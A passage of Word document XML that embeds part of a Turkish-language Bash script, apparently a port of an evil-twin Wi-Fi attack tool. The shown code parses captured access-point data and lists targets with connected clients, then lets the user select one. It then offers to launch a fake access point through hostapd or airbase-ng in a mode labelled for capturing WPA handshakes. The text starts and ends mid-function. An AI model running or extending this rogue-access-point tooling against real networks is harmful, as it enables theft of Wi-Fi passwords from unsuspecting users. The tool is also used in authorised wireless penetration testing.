    <w:p w14:paraId="7E28AB10" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7937750D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9277D2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>LINEAS_WIFIS_CSV=`wc -l $DUMP_PATH/$CSVDB | awk '{print $1}'`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110B961F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="048AED25" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if [ $LINEAS_WIFIS_CSV -le 3 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B85BA9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>vk496 &amp;&amp; break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA15D94" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188FC1EC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0F3554" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>linap=`cat $DUMP_PATH/$CSVDB | egrep -a -n '(Station|Cliente)' | awk -F : '{print $1}'`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087DB302" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>linap=`expr $linap - 1`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5948FEE2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">head -n $linap $DUMP_PATH/$CSVDB &amp;&gt; $DUMP_PATH/dump-02.csv </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606715EA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">tail -n +$linap $DUMP_PATH/$CSVDB &amp;&gt; $DUMP_PATH/clientes.csv </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC0AED6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo "                         Hedef AP'lerin Listesi "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1400391D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679BBA44" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo " NO      MAC                      CHAN    GÜVENLİK     GÜÇ    İSİM"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C45AD66" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781A1511" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>i=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA7266A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="76796016" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">while IFS=, read MAC FTS LTS CHANNEL SPEED PRIVACY CYPHER AUTH POWER BEACON IV LANIP IDLENGTH ESSID KEY;do </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296812F2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>longueur=${#MAC}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AB9792" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>PRIVACY=$(echo $PRIVACY| tr -d "^ ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E284B9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>PRIVACY=${PRIVACY:0:4}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520A6806" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if [ $longueur -ge 17 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74459E92" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>i=$(($i+1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE13290" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>POWER=`expr $POWER + 100`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335D8AF7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>CLIENTE=`cat $DUMP_PATH/clientes.csv | grep $MAC`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A8F89A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5601BD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if [ "$CLIENTE" != "" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8D88AC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">CLIENTE="*" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C12698" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F275A7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9858BE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e " ""$yesil"$i")"$beyaz"$CLIENTE\t""$sari"$MAC"\t""$yesil"$CHANNEL"\t""$kirmizi" $PRIVACY"\t  ""$sari"$POWER%"\t""$yesil"$ESSID""$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18913908" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>aidlenght=$IDLENGTH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1645B0BD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>assid[$i]=$ESSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9A0B6B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>achannel[$i]=$CHANNEL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B4C9A8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>amac[$i]=$MAC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA91E4D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>aprivacy[$i]=$PRIVACY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFC5BDE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>aspeed[$i]=$SPEED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325D4311" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE2C0E9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>done &lt; $DUMP_PATH/dump-02.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0F8D67" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB06B55" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -e ""$yesil"("$beyaz"*"$yesil") Bagli kullanicisi olan ag"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A125739" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA8FA28" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo "        Hedef Seçin               "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499178D8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -n "      #&gt; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD5C5AA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>read choice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600D0ABC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>idlenght=${aidlenght[$choice]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F61B16D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>ssid=${assid[$choice]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E0885A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>channel=$(echo ${achannel[$choice]}|tr -d [:space:])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDBB1F2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>mac=${amac[$choice]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2046752C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>privacy=${aprivacy[$choice]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A09CDF5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>speed=${aspeed[$choice]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752F19F3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>Host_IDL=$idlength</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B037956" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>Host_SPEED=$speed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F52AE09" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>Host_ENC=$privacy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EB6848" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>Host_MAC=$mac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0C8A45" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>Host_CHAN=$channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F213310" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>acouper=${#ssid}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B0B6EA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fin=$(($acouper-idlength))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5166217F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>Host_SSID=${ssid:1:fin}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561FF3F4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DECA48" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>conditional_clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5803028C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="06859F43" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>askAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3B7E1E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38622841" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="28AF19E9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Sahte AP yaratma.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6081C062" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function askAP {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBE470A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB849DC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>DIGITOS_WIFIS_CSV=`echo "$Host_MAC" | wc -m`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF6673E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E3AC10" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if [ $DIGITOS_WIFIS_CSV -le 15 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4CA312" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>selection &amp;&amp; break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D18F1C2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FF8202" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="052B5B1A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if [ "$(echo $WIFIDRIVER | grep -i 8187)" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5295C9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fakeapmode="airbase-ng"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4939B4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>askauth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463787A1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5B1224" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD3C312" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EF7B22" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>while true; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435388EA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B8505F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>infoap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F044C6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="778B27EF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "SAHTE AĞ YARATMA"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3087EB05" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "                                       "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694FE792" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "      "$yesil"1)"$yenidenrenklendir" Hostapd ("$kirmizi"Önerilir"$yenidenrenklendir")"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3973B431" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "      "$yesil"2)"$yenidenrenklendir" airbase-ng (Daha yavaş bağlantı)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D481B6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "      "$yesil"3)"$yenidenrenklendir" Çıkış"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4180E8A7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "                                       "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096A17BA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -n "      #&gt; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461CF1DE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>read yn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F77AD6F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4568B9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>case $yn in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACF3C2D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>1 ) fakeapmode="hostapd"; authmode="handshake"; handshakelocation; break ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B446250" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>2 ) fakeapmode="airbase-ng"; askauth; break ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497C7A58" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>3 ) selection; break ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476E4F4B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>* ) echo "Bilinmeyen seçenek.Tekrar seç"; conditional_clear ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE4DB77" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>esac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC461A8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">done </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE36CEF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED6CCE3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217F05EC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="2112DFF7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Hava üssünü seçerseniz PASS kontrol yöntemi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C26C72B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function askauth {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B39E8E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D670A5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
